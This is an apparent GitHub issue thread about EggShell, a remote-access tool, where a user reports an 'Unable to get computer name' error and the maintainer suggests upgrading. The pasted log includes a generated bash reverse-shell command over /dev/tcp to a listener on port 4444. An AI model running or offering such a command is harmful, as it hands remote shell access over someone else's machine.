### ISSUE TITLE
why Unable to get computer name

### ISSUE THREAD

**Issue by yitaolin** [neoneggplant/EggShell#58]
EggShell> 3
SET LHOST (Leave blank for 192.168.31.161)>
[*]  LHOST = 192.168.31.161
SET LPORT (Leave blank for 4444)>
[*]  LPORT = 4444
bash &> /dev/tcp/192.168.31.161/4444 0>&1
EggShell> Start Server? (Y/n): 
EggShell> Multi Server? (y/N): 
[*]  Listening on port 4444...
[*]  Connecting to 192.168.31.161
[*]  Detected OSX
[*]  Sending Payload
[*]  Waiting For Connection...
Something went wrong
[*]  Unable to get computer name
[*]  Press Enter To Continue

and why？

**Comment by songhongbao** [comment]
I get the same error msg.

**Comment by neoneggplant** [comment]
try with the new release of eggshell 3, it should address this issue
